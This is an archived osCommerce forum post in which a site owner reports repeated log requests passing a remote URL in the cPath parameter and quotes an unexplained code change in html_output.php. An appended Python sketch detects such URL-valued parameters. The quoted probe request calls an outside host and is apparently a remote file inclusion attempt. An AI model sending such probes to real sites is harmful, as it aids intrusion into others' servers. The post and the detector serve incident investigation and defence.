
osCommerce

The e-commerce.

Finding extra code in html_output.php


shopgrl


Posted

I have been finding this in my server logs: GET /osc/index.php?cPath=http://217.218.225.2:2082/index.html? HTTP/1.1" 200

 

When you add that to my site's full URL it leads to a TEST page. I found the image on that test page in my images folder on the server. My site is hosted by TechSquared out of Roanoke, VA. I never put that image there, so I assume someone else did. That image was put on the server on a certain date, so I checked other pages on the server for that date and found that the html_output.php page in the Includes/Functions folder had been altered on the same date. So I compared that page to the original one and they are slightly different. The different code is:

 

if(!file_exists($src) && file_exists('../'.$src)){
  copy('../'.$src, $src);
}

 

It comes right after this:

 

////
// The HTML image wrapper function
  function tep_image($src, $alt = '', $width = '', $height = '', $parameters = '') {
    if ( (empty($src) || ($src == DIR_WS_IMAGES)) && (IMAGE_REQUIRED == 'false') ) {
      return false;
    }

 

Can you tell me what that extra code is doing? Is this normal or has someone hacked the page?

 

I have blocked the IP 217.218.225.2 in htaccess. But I am still finding that type of posting all the time in my server logs with a variety of different initiating IPs. My concern is that whoever owns 217.218.225.2 (from Iran) is using my site for some nefarious purpose.

 

Thank you.

:huh:
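
Added example, not part of the original post: a Python sketch that scans access-log lines for requests where a query parameter's value is itself an absolute URL, the shape of the log entry quoted above, and groups them by the host named in that URL rather than by the requesting client. The log lines are constructed (client IPs are documentation addresses) and the function names are hypothetical.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample lines (Apache combined-format prefix). Client IPs are
# documentation addresses; the first request target is the one quoted in the post.
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2008:10:00:00 +0000] "GET /osc/index.php?cPath=http://217.218.225.2:2082/index.html? HTTP/1.1" 200 5120',
    '198.51.100.7 - - [01/Jan/2008:10:05:00 +0000] "GET /osc/index.php?cPath=http://217.218.225.2:2082/index.html? HTTP/1.1" 200 5120',
    '203.0.113.5 - - [01/Jan/2008:10:06:00 +0000] "GET /osc/index.php?cPath=21_33 HTTP/1.1" 200 7300',
    '203.0.113.9 - - [01/Jan/2008:10:07:00 +0000] "GET /osc/product_info.php?products_id=4&page=http%3A%2F%2Fexample.invalid%2Fx.txt HTTP/1.1" 404 310',
]

# client IP, ident, user, [time], "METHOD target PROTO", status
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')
# A parameter value that is itself an absolute URL.
URL_VALUE_RE = re.compile(r'^\s*(?:https?|ftp)://', re.IGNORECASE)

def find_url_params(line):
    """Return (client_ip, status, [(param, value)]) if any parameter holds a URL."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ip, _method, target, status = m.groups()
    # parse_qsl percent-decodes once; unquote again to catch double encoding.
    hits = [(k, v) for k, v in parse_qsl(urlsplit(target).query, keep_blank_values=True)
            if URL_VALUE_RE.match(unquote(v))]
    return (ip, int(status), hits) if hits else None

def summarize(lines):
    """Map (parameter, host named in its URL value) -> set of requesting client IPs."""
    groups = defaultdict(set)
    for line in lines:
        hit = find_url_params(line)
        if hit:
            ip, _status, params = hit
            for name, value in params:
                host = urlsplit(unquote(value).strip()).hostname
                groups[(name, host)].add(ip)
    return dict(groups)

if __name__ == "__main__":
    for (name, host), clients in sorted(summarize(SAMPLE_LOG).items()):
        print(f"{name} -> {host}: {len(clients)} client IP(s): {sorted(clients)}")
```

A 200 status on such a line only shows that the script answered the request; it does not by itself show that the remote URL was fetched.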

Archived

This topic is now archived and is closed to further replies.
